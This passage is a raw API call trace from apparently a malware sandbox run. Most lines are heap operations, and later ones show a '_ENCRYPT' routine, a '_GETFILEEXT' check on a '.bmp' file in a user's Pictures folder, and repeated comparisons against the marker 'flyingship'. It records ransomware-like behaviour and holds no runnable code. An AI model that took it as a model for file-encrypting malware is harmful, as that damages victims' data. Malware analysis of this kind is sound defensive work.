0x9ba138 [0190.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0190.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0190.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0190.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0190.659] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0190.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0190.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0190.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0190.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0190.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0190.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0190.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0190.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0190.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0190.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0190.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0190.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0190.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.661] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0190.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0190.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0190.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0190.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0190.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0190.672] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0190.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0190.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0190.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0190.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0190.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0190.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0190.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0190.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0190.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0190.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0190.673] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0190.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0190.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0190.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0190.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0190.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0190.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.674] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0190.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0190.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba000 [0190.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba000, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0190.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0190.674] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0190.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0190.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0190.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0190.674] CloseHandle (hObject=0x158) returned 1 [0190.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0190.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0190.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0190.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0190.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.675] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0190.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0190.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0190.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0190.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0190.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0190.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0190.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0190.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0190.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0190.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0190.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0190.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0190.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0190.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.675] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0190.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0190.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0190.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.676] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.676] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0190.676] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.676] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0190.676] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0190.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.676] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.676] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.676] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.676] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcca756f0, ftCreationTime.dwHighDateTime=0x1d5e4b5, ftLastAccessTime.dwLowDateTime=0x4016bd20, ftLastAccessTime.dwHighDateTime=0x1d5dba0, ftLastWriteTime.dwLowDateTime=0x4016bd20, ftLastWriteTime.dwHighDateTime=0x1d5dba0, nFileSizeHigh=0x0, nFileSizeLow=0x1720a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="rcuM7uLGY1kXH5mCjrE6.bmp", cAlternateFileName="RCUM7U~1.BMP")) returned 0x90add8 [0190.676] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0190.677] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.677] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcca756f0, ftCreationTime.dwHighDateTime=0x1d5e4b5, ftLastAccessTime.dwLowDateTime=0x4016bd20, ftLastAccessTime.dwHighDateTime=0x1d5dba0, ftLastWriteTime.dwLowDateTime=0x4016bd20, ftLastWriteTime.dwHighDateTime=0x1d5dba0, nFileSizeHigh=0x0, nFileSizeLow=0x1720a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="rcuM7uLGY1kXH5mCjrE6.bmp", cAlternateFileName="RCUM7U~1.BMP")) returned 0x90add8 [0190.677] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0190.677] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S 